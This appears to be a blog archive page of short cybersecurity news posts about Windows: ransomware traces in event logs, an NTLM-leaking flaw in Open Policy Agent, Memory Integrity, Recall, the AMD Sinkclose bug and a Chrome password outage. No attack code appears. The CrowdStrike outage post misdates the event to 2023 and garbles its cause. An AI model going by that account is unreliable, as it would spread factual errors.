Other older ransomware families, like Shade, GandCrab, and Vice Society, similarly display the same event patterns. They especially generate errors with event IDs 13 and 10016, linked to the failed access attempts to COM applications. The reason behind it is ransomware tries to remove Volume Shadow Copies so the victims won't be able to recover encrypted files.


Event Log Monitoring: Not a Silver Bullet But a Mighty Defence

Monitoring these specific Windows Event Logs can certainly prove extremely useful in identifying ransomware, though JPCERT/CC believes such should only be part of the total security strategy. This would truly be transformational were early detection to be combined with other control measures against spreading the attack.

Surprisingly, this method is much more potent for newer ransomware variants rather than those already in the wild, like WannaCry and Petya, which left very minor traces in Windows logs. As ransomware continues to progress, the patterns they leave behind in logs are becoming very obvious, and log monitoring will be more of a good ear for today's cybersecurity infrastructure.

In 2022, another well-known cybersecurity group also published a SANS ransomware detection guide from Windows Event Logs. Both sources point out how ransomware detection has evolved with time, helping organisations better prepare for such threats.


Read more »
Windows
Authentication CVE-2024-8260 Cyber Security NTLM OPA Patch relay Tenable Vulnerability Windows

Critical Flaw in Open Policy Agent Exposed NTLM Credentials, Patch Released

 

A now-resolved security vulnerability in Styra's Open Policy Agent (OPA) could have exposed New Technology LAN Manager (NTLM) hashes, potentially leading to credential leakage. If exploited, the flaw allowed attackers to capture the NTLM credentials of the OPA server’s local user account and send them to a remote server. From there, they could either crack the password or relay the authentication, according to a report by cybersecurity firm Tenable, shared with The Hacker News.

The vulnerability, identified as CVE-2024-8260 and classified as a Server Message Block (SMB) force-authentication flaw, affected both the Command Line Interface (CLI) and the Go software development kit (SDK) on Windows. The issue arose from improper input validation, enabling unauthorized access by leaking the Net-NTLMv2 hash of the logged-in user on the Windows device running OPA.

Exploiting this vulnerability required specific conditions: the victim had to initiate outbound SMB traffic over port 445, gain an initial foothold through social engineering, or run the OPA CLI using a Universal Naming Convention (UNC) path rather than a Rego rule file.

Tenable security researcher Shelly Raban explained that when a Windows machine accesses a remote share, it sends the NTLM hash of the local user to authenticate to the remote server. Attackers can capture these credentials to perform relay attacks or crack the password offline. Following the responsible disclosure in June 2024, the issue was patched in version 0.68.0, released on August 29, 2024.

Tenable emphasized the importance of securing open-source projects to avoid exposing vendors and users to potential threats. The disclosure of this vulnerability coincides with Akamai's revelation of a privilege escalation flaw (CVE-2024-43532) in Microsoft's Remote Registry Service, which also involved NTLM relay attacks.

Microsoft, in response to NTLM vulnerabilities, reiterated its commitment to replace NTLM with Kerberos in Windows 11 to enhance authentication security.
Read more »
Windows
Antivirus Memory Integrity Microsoft performance Protection Ransomware Security system Technology Virtualization Windows

How to Enhance Your Windows Security with Memory Integrity

 

Windows Security, the antivirus program built into Microsoft’s operating system, is generally sufficient for most users. It provides a decent level of protection against various threats, but a few important features, like Memory Integrity, remain turned off by default. This setting is crucial as it protects your system’s memory from malicious software that attempts to exploit Windows drivers, potentially taking control of your PC.

When you enable Memory Integrity, it activates Virtualization Based Security (VBS). This feature separates the code verification process from the operating system, creating a secure environment and adding an additional layer of protection. Essentially, VBS ensures that any code executed on your system is thoroughly checked, preventing malicious programs from sneaking through Windows’ defenses.

However, Microsoft disables Memory Integrity by default to maintain smoother app performance. Some applications may not function properly with this feature on, as the extra layer of security can interfere with the way certain programs execute code. For users who prioritize app performance over security, this trade-off may seem appealing.

But for those concerned about malicious attacks, enabling Memory Integrity is a smart choice. It prevents malware from bypassing the usual system checks, providing peace of mind when dealing with potential security threats. On older PCs, though, you might notice a slight reduction in performance once Memory Integrity is activated.

Curious to see how your system handles this extra protection? Enabling and disabling Memory Integrity is a simple process. First, type “Windows Security” into the search bar or Start menu. Under Device Security, you may see a notification if Memory Integrity is off. Click Core Isolation, then toggle Memory Integrity on. To deactivate it, return to the same settings and flip the switch off.

It’s not just Memory Integrity that comes disabled by default in Windows. Microsoft leaves certain protections off to strike a balance between security and user experience. Another useful feature you can enable is ransomware protection, which safeguards specific folders and prevents unauthorized apps from locking you out of your data. Similarly, you can turn on advanced app screening to block potentially harmful programs.

While leaving Memory Integrity and other protections off can offer a smoother computing experience, activating them significantly strengthens your system’s defenses against cyber threats. It’s a choice between performance and security, but for those prioritizing protection, flipping these settings on is an easy step towards a safer PC.
Read more »
Windows
Advanced Technology Microsoft Microsoft Copilot Security Feature Windows

Windows 11’s Recall feature is Now Ready For Release, Microsoft Claims

 

Microsoft has released an update regarding the Recall feature in Windows 11, which has been on hold for some time owing to security and privacy concerns. The document also details when Microsoft intends to move forward with the feature and roll it out to Copilot+ PCs. 

Microsoft said in a statement that the intention is to launch Recall on CoPilot+ laptops in November, with a number of protections in place to ensure that the feature is safe enough, as explained in a separate blog post. So, what are these measures supposed to appease the critics of Recall - a supercharged AI-powered search in Windows 11 that uses regular screenshots ('snapshots' as Microsoft calls them) of the activity on your PC - as it was originally intended? 

One of the most significant changes is that, as Microsoft had previously informed us, Recall will only be available with permission, rather than being enabled by default as it was when the function was first introduced. 

“During the set-up experience for Copilot+ PCs, users are given a clear option whether to opt-in to saving snapshots using Recall. If a user doesn’t proactively choose to turn it on, it will be off, and snapshots will not be taken or saved,” Microsoft noted. 

Additionally, as Microsoft has stated, snapshots and other Recall-related data would be fully permitted, and Windows Hello login will be required to access the service. In other words, you'll need to check in through Hello to prove that you're the one using Recall (not someone else on your PC). 

Furthermore, Recall will use a secure environment known as a Virtualization-based Security Enclave, or VBS Enclave, which is a fully secure virtual computer isolated from the Windows 11 system that can only be accessed by the user via a decryption key (given with the Windows Hello sign-in).

David Weston, who wrote Microsoft’s blog post and is VP of Enterprise and OS Security, explained to Windows Central: “All of the sensitive Recall processes, so screenshots, screenshot processing, vector database, are now in a VBS Enclave. We basically took Recall and put it in a virtual machine [VM], so even administrative users are not able to interact in that VM or run any code or see any data.”

Similarly, Microsoft cannot access your Recall data. And, as the software giant has already stated, all of this data is stored locally on your machine; none of it is sent to the cloud. This is why Recall is only available on Copilot+ PCs - it requires a strong NPU for acceleration and local processing to function properly. 

Finally, Microsoft addresses a previous issue about Recall storing images of, say, your online banking site and perhaps sensitive financial information - the tool now filters out things like passwords and credit card numbers.
Read more »
Windows
AMD Linux malware Sinkclose Windows

Experts Find Sinkclose Bug in Millions of AMD Processors, Hard to Patch

Experts Find Sinkclose Bug in Millions of AMD Processors, Hard to Patch

A recently found major security flaw called 'Sinkclose' impacts virtually all of the AMD's processors released since 2006. The vulnerability allows threat actors to deeply infiltrate into a system, making it difficult to identify and eliminate the malicious software. According to experts, the problem is serious, in some cases, it would be easier to just dump the system than to fix it.

About Sinkclose Bug

But there is a good side to it, since the flaw has not been found for 18 years, chances are it hasn't been exploited. Additionally, AMD is patching its platforms to protect the affected processors, however, not all have received a patch yet. See this list for full details.

Sinkclose is known for escaping anti-viruses and persistence even after reinstalling OS. The bug allows threat actors to execute code within AMD processors' SMM (System Management System), a privileged region kept for critical firmware operations. To use the flaw, threat actors must first gain access to the system's kernel, a difficult task, but doable. But the system must already have been targeted by some other attack.

Persistent Threat

After securing the access, the Sinkclose vulnerability lets the attackers install bootkit malware that escapes detection by antivirus tools, staying hidden within the system and persists even after re-installing the OS.

The flaw uses a feature in AMD chips called TClose, which maintains compatibility with older devices. By exploiting this feature, the experts could redirect the processor to execute their code at the SMM level. The process is complicated but lets attackers with access and control over the device.

Flaw Needs Kernel-level Access

Cybersecurity experts Krzysztof Okupski and Enrique Nissim from IOActive found the Sinkclose vulnerability, they will present it at the Defcon conference."To take advantage of the vulnerability, a hacker has to already possess access to a computer's kernel, the core of its operating system," AMD said to Wired.

Experts highlight that although the Sinkclose exploit needs kernel-level access, the flaws at this level are found in Linux and Windows systems. Advanced state-sponsored hackers might already have what it takes to exploit these flaws. 

Experts suggest kernel exploits are readily available, which makes Sinkclose the second stage for the threat actors. To eliminate the malware, one must open the computer and connect to a particular part of its memory using an SPI Flash programmer, inspect the memory with caution, and then remove the malware. 

Read more »
Windows
CrowdStrike Microsoft System Bug Technology Windows

CrowdStrike Explains Root Cause of Globat IT Outage

CrowdStrike Explains Root Cause of Globat IT Outage

In July 2023, we witnessed a large-scale global breakdown impacting over 8.5 million Microsoft users. The reason? A software update that turned into chaos. Leading cybersecurity company CrowdStrike recently published its root cause analysis, providing insights on the incident. Let's understand what happened.

The Global IT Outage

The incident started with a routine software update. Microsoft users worldwide were waiting for new features and security updates. But an update had a secret landmine- a hidden sensor within CrowdStrike's Falcon software.

The Repercussions

The damage was sudden and severe. Organizations stopped working, government agencies had problems, and important services were hindered. The breakdown underscored our reliance on tech and the downside of interconnected systems.

The Root Problem

Sensor Defect

CrowdStrike's Falcon software overlooks network security, identifying threats and anomalies. The fault sensor was in the update and triggered a chain reaction. It misunderstood genuine traffic as suspicious, which led to worldwide chaos.

Lack of Testing

Experts have underscored the need for rigorous testing, questions were raised about the presence of critical bugs. The answers lie in the hasty development cycles and rush to meet the deadlines. Quality control was ignored, resulting in dangerous consequences.

Preventive Measures

  • CrowdStrike has acknowledged the mistake and is taking preventive measures to avoid such incidents in future:
  • It now conducts exhaustive testing, simulating various scenarios before deploying updates. Rigorous checks ensure no hidden surprises.
  • The company commits to transparency. Users will receive detailed release notes, highlighting changes and potential risks.
  • CrowdStrike collaborates with other cybersecurity firms and Microsoft itself. Sharing insights and best practices strengthens the ecosystem.

Takeaways

For Users

  • Vigilance: Stay informed about software updates. Read release notes and understand changes.
  • Backup Plans: Prepare for outages. Regular backups and redundancy can save the day.

For Developers

  • Quality Over Speed: Rushed releases lead to disasters. Prioritize quality assurance.
  • Test Thoroughly: Test, retest, and then test some more. Remember to consider the impact of a single line of code.

The CrowdStrike-Microsoft debacle serves as a wake-up call. The hyper-connected reality has weaknesses too,  a minor glitch can turn into global turmoil.

Read more »
Windows
Cyber Security US Government Vulnerability management Window Systems Windows

Microsoft Update Alert: 70% Of Windows Users Are Now At Risk

 

Microsoft's end-of-support date for Windows 10 is approaching on October 14, 2025, and the operating system is already facing a serious security threat. With 70% of Windows users still operating Windows 10, the situation in terms of cyber-attacks has become increasingly perilous. This security bug has major consequences for individuals and organisations who rely on Windows 10. 

What's happening?

A 2018 Windows flaw has been added to the US government's known exploited vulnerabilities (KEV) database, cautioning of potential privilege escalation assaults and remote code execution. Researchers believe that the vulnerability, CVE-2018-0824, was exploited by the Chinese hacker outfit APT41. This threat actor is supported by the Ministry of State Security and has a high level of seriousness because it targets both government and private organisations. 

The US government has warned people to fix or stop using Windows if there is any risk by August 26. If this is not done, users will remain vulnerable to assaults. This vulnerability will not affect Windows 11. Additionally, it would not harm updated Windows systems, emphasising the importance of upgrades for users. The warnings appear to be insufficient, as many users continue to use Windows 10, with only 30% having updated their systems to Windows 11. 

Furthermore, as the end-of-support date approaches, hundreds of scam emails are likely to target Windows 10 customers' inboxes. The hackers would take advantage of this situation and jeopardise the security of users' data and systems, resulting in data breaches and other serious consequences such as system compromise and financial losses. 

Take a look at Reddit or the comments on this post to see the enormous number of Windows users who are waiting for Microsoft to pull a late rabbit out of the bag and expand Windows 10 support. It is unclear how this will affect all those who have invested in upgrading. 

Given the recent experience, with global images of blue screens of death all around, come October, this could be a hackers' paradise for a while. Another aspect to consider is that malicious actors would take advantage of the situation and send out scam after scam to nervous Windows 10 users.
Read more »
Windows
Business Safety Cyber Security Linux Microsoft Safety Windows

Report: macOS Most Vulnerable to Endpoint Attacks Compared to Windows and Linux

 

A new report from Picus Security has unveiled a concerning vulnerability in many IT environments: a high risk of complete takeover through escalated privileges. 

Simulated attacks revealed that while organizations can typically defend against seven out of ten attacks, the persistent threat of sophisticated cybercrime syndicates leaves a substantial margin for error.

Full environment takeovers occur when attackers gain administrator-level access, enabling them to freely navigate and compromise systems. Alarmingly, Picus successfully achieved domain admin access in 40% of the tested environments.

While Linux and Windows demonstrated relatively strong defenses against endpoint attacks, macOS proved significantly more vulnerable, raising concerns about its security posture. Picus CTO Volkan Ertürk emphasized the need for increased focus on securing macOS systems, recommending the use of threat repositories like the Picus Threat Library to identify and address vulnerabilities.

The report also highlighted the prevalence of basic security lapses, with a quarter of companies using easily guessable passwords and a mere 9% effectively preventing data exfiltration. Cybercrime groups like BlackByte, BabLock, and Hive posed the most significant challenges for organizations.

“Like a cascade of falling dominoes that starts with a single push, small gaps in cybersecurity can lead to big breaches,” said Dr. Suleyman Ozarslan, Picus co-founder and VP of Picus Labs.

It's clear that organizations are still experiencing challenges when it comes to threat exposure management and balancing priorities. Small gaps that lead to attackers obtaining domain admin access are not isolated incidents, they are widespread. Last year, the attack on MGM used domain admin privileges and super admin accounts. It stopped slot machines, shut down virtually all systems, and blocked a multi-billion-dollar company from doing business for days,” Ozarslan said.

Read more »
Windows
Google Google Chrome Password Manager Technology Windows

Passwords Vanish for 15 Million Windows Users, Google Says "Sorry"

Passwords Vanish for 15 Million Windows Users, Google Says "Sorry"

Google says “sorry” after a bug stopped Windows users from finding or saving their passwords. The issue began on 24th July and stayed till 25th July, before it was fixed. The problem, google said was due to “a change in product behavior without proper feature guard,” an incident sharing similarities with the recent Crowdstrike disruption.

The disappearing password problem affected Chrome users worldwide, causing them trouble finding saved passwords. Users even had trouble finding newly saved passwords. Google has fixed the issue now, saying the problem was in the M127 version of Chrome Browser on Windows devices.

Who were the victims?

It is difficult to pinpoint the exact numbers, but based on Google’s 3 Billion Chrome users worldwide, with the majority of Chrome users, we can get a positive estimate. According to experts, around 15 million users experienced the vanishing password problem.  "Impacted users were unable to find passwords in Chrome's password manager. Users can save passwords, however it was not visible to them. The impact was limited to the M127 version of Chrome Browser on the Windows platform," said Google.

The password problem is now fixed

Fortunately, Google has now fixed the issue, users only need to restart their Chrome browsers. “We apologize for the inconvenience this service disruption/outage may have caused,” said Google. If a user has any inconveniences beyond what Google has covered, they are free to contact Google Workplace Support.

Chrome Password Manager: How to use it?

Google's Chrome password manager may be accessed through the browser's three-dot menu by selecting Passwords & Autofill, then Google Password Manager. Alternatively, you can install the password manager Chrome app from the password manager settings and then access it from the Google Apps menu. If Chrome invites you to autofill a password, clicking Manage Passwords will take you directly there.

Things that went missing besides passwords recently

According to cybersecurity reporter Brian Krebs, the email verification while creating a new Google Workplace Account also went missing for a few Chrome users. 

The authentication problem, which is now fixed, allowed threat actors to skip the email verification needed to create a Google Workplace account, allowing them to mimic a domain holder at third-party services. This allowed a threat actor to log in to third-party services like a Dropbox account.  

Read more »
Subscribe to: Posts (Atom)